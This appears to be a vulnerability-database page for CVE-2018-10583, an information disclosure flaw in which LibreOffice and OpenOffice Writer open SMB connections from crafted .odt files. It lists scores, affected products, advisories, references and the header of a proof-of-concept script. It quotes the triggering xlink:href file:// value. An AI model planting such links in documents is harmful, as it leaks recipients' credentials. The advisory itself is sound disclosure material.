Published: 01/05/2018 Updated: 07/11/2023

CVSS v2 Base Score: 5 | Impact Score: 2.9 | Exploitability Score: 10

CVSS v3 Base Score: 7.5 | Impact Score: 3.6 | Exploitability Score: 3.9

VMScore: 505

Vector: AV:N/AC:L/Au:N/C:P/I:N/A:N

An information disclosure vulnerability occurs when LibreOffice 6.0.3 and Apache OpenOffice Writer 4.1.5 automatically process and initiate an SMB connection embedded in a malicious file, as demonstrated by xlink:href=file://192.168.0.2/test.jpg within an office:document-content element in a .odt XML document.

Vulnerable Product	Search on Vulmon	Subscribe to Product
libreoffice libreoffice 6.0.3
apache openoffice 4.1.5
debian debian linux 8.0
debian debian linux 7.0
debian debian linux 9.0
redhat enterprise linux desktop 7.0
redhat enterprise linux workstation 7.0
redhat enterprise linux server 7.0
canonical ubuntu linux 16.04
canonical ubuntu linux 14.04

Synopsis Moderate: libreoffice security and bug fix update Type/Severity Security Advisory: Moderate Topic An update for libreoffice is now available for Red Hat Enterprise Linux 7Red Hat Product Security has rated this update as having a security impact of Moderate A Common Vulnerability Scoring System ( ...

Several security issues were fixed in LibreOffice ...

An information disclosure vulnerability occurs when LibreOffice 603 and Apache OpenOffice Writer 415 automatically process and initiate an SMB connection embedded in a malicious file, as demonstrated by xlink:href=file://19216802/testjpg within an office:document-content element in a odt XML document ...

#! /usr/bin/python # Exploit Title: Malicious ODF File Creator # Date: 1st May 2018 # Exploit Author: Richard Davy # Vendor Homepage: wwwlibreofficeorg/ # Software Link: wwwlibreofficeorg/ # Version: LibreOffice 603, OpenOffice 415 # Tested on: Windows 10 # #Quick script/POC code to create a malicious ODF which can be used ...

RedTeam Pentesting discovered a vulnerability in the BigBlueButton web conferencing system version 2225 that allows participants of a conference with permissions to upload presentations to read arbitrary files from the file system and perform server-side requests This leads to administrative access to the BigBlueButton instance ...

Full Disclosure mailing list archives   By Date By Thread </form>    [RT-SA-2020-005] Arbitrary File Disclosure and Server-Side Request Forgery in BigBlueButton <!--X-Subject-Header-End-- ...

An information disclosure vulnerability occurs when LibreOffice 6.0.3 and Apache OpenOffice Writer 4.1.5 automatically process and initiate an SMB connection embedded in a malicious file, as demonstrated by "xlink:href=file://192.168.0.2/test.jpg" within an "office:document-content" element in a ".odt XML document".

CVE-2018-10583 An information disclosure vulnerability occurs when LibreOffice 603 and Apache OpenOffice Writer 415 automatically process and initiate an SMB connection embedded in a malicious file, as demonstrated by "xlink:href=file://19216802/testjpg" within an "office:document-content" element in a "odt XML document" bitly/2w9

CWE-200 http://secureyourit.co.uk/wp/2018/05/01/creating-malicious-odt-files/https://security-tracker.debian.org/tracker/CVE-2018-10583 https://www.exploit-db.com/exploits/44564/https://access.redhat.com/errata/RHSA-2018:3054 https://usn.ubuntu.com/3883-1/http://seclists.org/fulldisclosure/2020/Oct/26 https://lists.apache.org/thread.html/6c65f22306c36c95e75f8d2b7f49cfcbeb0a4614245c20934612a39d%40%3Cdev.openoffice.apache.org%3E https://lists.apache.org/thread.html/0598708912978b27121b2e380b44a225c706aca882cd1da6a955a0af%40%3Cdev.openoffice.apache.org%3E https://lists.apache.org/thread.html/c8fd59ac77b42aac90eb5c59b87f3ab59b5e0c3bfb4819aa649a2909%40%3Cdev.openoffice.apache.org%3E https://access.redhat.com/errata/RHSA-2018:3054 https://usn.ubuntu.com/3883-1/https://nvd.nist.gov https://www.exploit-db.com/exploits/44564/

CVE-2018-10583

Vulnerability Summary

Vulnerability Trend

Vendor Advisories

Exploits

Mailing Lists

Github Repositories

References

Vulmon Search

About

Products

Connect